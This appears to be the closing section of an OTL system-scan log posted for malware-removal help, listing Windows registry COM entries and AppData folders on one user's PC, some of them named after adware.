[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] "" = %systemroot%\system32\wbem\fastprox.dll -- [2013-08-22 04:45:10 | 000,691,712 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Free [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64 "" = C:\Windows\SysNative\wbem\wbemess.dll -- [2013-08-22 11:45:17 | 000,483,840 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Both [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] [color=#E56717]========== LOP Check ==========[/color] [2013-06-23 20:52:53 | 000,000,000 | ---D | M] -- C:\Users\Edyta\AppData\Roaming\0D1F1S1C1P0P1C1F1N1C1T1H2UtF1E1I [2014-06-13 07:50:25 | 000,000,000 | ---D | M] -- C:\Users\Edyta\AppData\Roaming\337Games [2013-06-23 20:52:00 | 000,000,000 | ---D | M] -- C:\Users\Edyta\AppData\Roaming\Babylon [2014-01-20 22:26:43 | 000,000,000 | ---D | M] -- C:\Users\Edyta\AppData\Roaming\BankID [2013-04-30 20:01:08 | 000,000,000 | ---D | M] -- C:\Users\Edyta\AppData\Roaming\Desk 365 [2014-07-09 18:50:11 | 000,000,000 | ---D | M] -- C:\Users\Edyta\AppData\Roaming\eDownload [2013-05-06 09:00:38 | 000,000,000 | ---D | M] -- C:\Users\Edyta\AppData\Roaming\eIntaller [2014-07-05 19:16:46 | 000,000,000 | ---D | M] -- C:\Users\Edyta\AppData\Roaming\EPSON [2013-09-28 22:17:59 | 000,000,000 | ---D | M] -- C:\Users\Edyta\AppData\Roaming\eUpdate [2013-04-30 16:43:01 | 000,000,000 | ---D | M] -- C:\Users\Edyta\AppData\Roaming\GHISLER [2013-04-14 16:30:27 | 000,000,000 | ---D | M] -- C:\Users\Edyta\AppData\Roaming\iid [2013-05-19 20:02:30 | 000,000,000 | ---D | M] -- C:\Users\Edyta\AppData\Roaming\LibreOffice [2013-06-19 23:06:56 | 000,000,000 | ---D | M] -- C:\Users\Edyta\AppData\Roaming\MusicNet [2013-06-21 21:15:52 | 000,000,000 | ---D | M] -- C:\Users\Edyta\AppData\Roaming\mysearchdial [2013-05-01 09:41:58 | 000,000,000 | ---D | M] -- C:\Users\Edyta\AppData\Roaming\NapiProjekt [2013-04-08 22:01:35 | 000,000,000 | ---D | M] -- C:\Users\Edyta\AppData\Roaming\Personal [2013-05-19 21:46:27 | 000,000,000 | ---D | M] -- C:\Users\Edyta\AppData\Roaming\Samsung [2014-07-05 17:57:37 | 000,000,000 | ---D | M] -- C:\Users\Edyta\AppData\Roaming\SimilarAddon [2014-07-05 17:57:30 | 000,000,000 | ---D | M] -- C:\Users\Edyta\AppData\Roaming\StormFall [2014-03-12 17:31:48 | 000,000,000 | ---D | M] -- C:\Users\Edyta\AppData\Roaming\sweet-page [2014-07-11 21:29:30 | 000,000,000 | ---D | M] -- C:\Users\Edyta\AppData\Roaming\Systweak [2014-09-09 20:37:59 | 000,000,000 | ---D | M] -- C:\Users\Edyta\AppData\Roaming\uTorrent [2013-04-30 19:40:23 | 000,000,000 | ---D | M] -- C:\Users\Edyta\AppData\Roaming\WebApp [2013-10-06 18:42:51 | 000,000,000 | ---D | M] -- C:\Users\Edyta\AppData\Roaming\WinZipper [color=#E56717]========== Purity Check ==========[/color] [color=#E56717]========== Alternate Data Streams ==========[/color] @Alternate Data Stream - 220 bytes -> C:\Users\Edyta\OneDrive:ms-properties < End of report >